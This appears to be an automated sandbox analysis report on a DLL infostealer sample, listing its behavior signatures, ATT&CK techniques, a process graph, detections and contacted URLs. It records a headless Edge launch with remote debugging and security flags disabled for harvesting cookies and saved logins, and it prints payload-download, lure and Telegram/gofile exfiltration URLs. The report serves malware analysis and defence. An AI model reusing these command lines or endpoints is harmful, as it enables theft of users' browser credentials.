            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeAPI coverage: 9.0 %
            Source: C:\Windows\System32\loaddll64.exe TID: 6804Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA3BE70 GetSystemInfo,14_2_00007FFDFBA3BE70
            Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
            Source: rundll32.exe, 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
            Source: rundll32.exe, 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
            Source: rundll32.exe, 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
            Source: rundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: rundll32.exe, 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 2microsoft-hyper-v-client-migration-replacement.manP%b
            Source: rundll32.exe, 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.manP%b
            Source: rundll32.exe, 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: +microsoft-hyper-v-migration-replacement.manP%b
            Source: rundll32.exe, 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3microsoft-hyper-v-drivers-migration-replacement.manX[
            Source: msedge.exe, 00000005.00000002.1764271038.00000123E4A2B000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1772003555.000001BE4842B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: rundll32.exe, 00000003.00000003.3140366855.0000022E005C3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3141060828.0000022E005C4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2844530560.0000022E005CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2844268121.0000022E005C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3101875964.0000022E005A9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2600036264.0000022E005C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3102376508.0000022E005AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3100675673.0000022E005C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3139867320.0000022E005A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2600376518.0000022E005CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4176283675.00000282CCF40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
            Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA69AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFDFBA69AC0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA69AC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFDFBA69AC0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA5B728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FFDFBA5B728

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 208.95.112.1 0Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.65.251.78 0Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.67.74.152 0Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1Jump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9991 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9694 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9487 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9268 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9231 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9582 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior

            Language, Device and Operating System Detection

            barindex
            Source: Yara matchFile source: mP8rzGD7fG.dll, type: SAMPLE
            Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00007FFDF9C725D4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_00007FFDF9C725D4

            Stealing of Sensitive Information

            barindex
            Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724355328959811\FilesJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724355328959811\Files\DJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724355388605527\FilesJump to behavior
            Source: C:\Windows\System32\rundll32.exeDirectory queried: C:\Users\Public\Documents\638724355388605527\Files\DJump to behavior
            Source: Yara matchFile source: 00000003.00000002.3141594672.0000022E04CDD000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2591824214.000002C4338DD000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5812, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7824, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            111
            Process Injection
            21
            Masquerading
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            LSASS Memory21
            Security Software Discovery
            Remote Desktop Protocol11
            Data from Local System
            1
            Remote Access Software
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
            Process Injection
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeylogging3
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Rundll32
            Cached Domain Credentials3
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590663 Sample: mP8rzGD7fG.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 84 60 ip-api.com 2->60 62 gitlab.com 2->62 64 api.ipify.org 2->64 74 Multi AV Scanner detection for submitted file 2->74 76 Yara detected Telegram Recon 2->76 78 Drops password protected ZIP file 2->78 80 Sigma detected: Potential Data Stealing Via Chromium Headless Debugging 2->80 10 loaddll64.exe 1 2->10         started        signatures3 process4 process5 12 rundll32.exe 15 10->12         started        17 rundll32.exe 14 10->17         started        19 cmd.exe 1 10->19         started        21 3 other processes 10->21 dnsIp6 68 ip-api.com 208.95.112.1, 49974, 49989, 50071 TUT-ASUS United States 12->68 70 gitlab.com 172.65.251.78, 443, 49948 CLOUDFLARENETUS United States 12->70 72 api.ipify.org 172.67.74.152, 443, 49966, 49970 CLOUDFLARENETUS United States 12->72 58 C:\Windows\System32\e_sqlite3.dll, PE32+ 12->58 dropped 82 System process connects to network (likely due to code injection or exploit) 12->82 84 Tries to harvest and steal browser information (history, passwords, etc) 12->84 23 msedge.exe 4 12->23         started        25 msedge.exe 12->25         started        27 msedge.exe 12->27         started        86 Attempt to bypass Chrome Application-Bound Encryption 17->86 29 msedge.exe 3 17->29         started        31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        35 rundll32.exe 1 19->35         started        38 WerFault.exe 20 16 21->38         started        40 WerFault.exe 16 21->40         started        file7 signatures8 process9 dnsIp10 42 msedge.exe 23->42         started        44 msedge.exe 25->44         started        46 msedge.exe 27->46         started        48 msedge.exe 29->48         started        50 msedge.exe 31->50         started        52 msedge.exe 33->52         started        66 127.0.0.1 unknown unknown 35->66 54 msedge.exe 5 35->54         started        process11 process12 56 msedge.exe 54->56         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            mP8rzGD7fG.dll33%VirustotalBrowse
            mP8rzGD7fG.dll47%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Windows\System32\e_sqlite3.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.orgP%b0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            gitlab.com
            172.65.251.78
            truefalse
              high
              api.ipify.org
              172.67.74.152
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=falsefalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mono/linker/issues/1731rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                        high
                        https://github.com/mono/linker/issues/2025rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                          high
                          https://github.com/mono/linker/pull/2125.rundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                            high
                            https://github.com/mono/linker/issues/1895vUsingrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                              high
                              https://gitlab.com/-/sandbox/;rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                  high
                                  http://www.chambersign.org1msedge.exe, 00000006.00000002.1773460306.00002D6000058000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://snowplow.trx.gitlab.netrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://system.data.sqlite.org/Xrundll32.exe, 00000003.00000002.3143465266.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                        high
                                        https://www.newtonsoft.com/jsonrundll32.exe, 00000003.00000002.3143465266.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2594041980.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpfalse
                                          high
                                          https://collector.prd-278964.gl-product-analytics.comrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            http://ip-api.com/json/yrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidP%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                high
                                                https://api.gofile.io/serversP%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                  high
                                                  https://gitlab.comrundll32.exe, 0000000E.00000002.2591824214.000002C43386D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falseP%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                      high
                                                      https://github.com/dotnet/runtimerundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                        high
                                                        https://api.telegram.org/botP%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                          high
                                                          https://api.ipify.orgP%brundll32.exe, 00000003.00000002.3143175786.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177391028.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2593748533.00007FFDFA4AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYrundll32.exe, 00000003.00000002.3143465266.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4177636302.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpfalse
                                                            high
                                                            http://ip-api.com:80/rundll32.exe, 00000003.00000002.3141594672.0000022E04DB1000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3141594672.0000022E04D89000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C433981000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2591824214.000002C43399D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://aka.ms/dotnet-warnings/rundll32.exe, 0000000E.00000002.2594041980.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                high
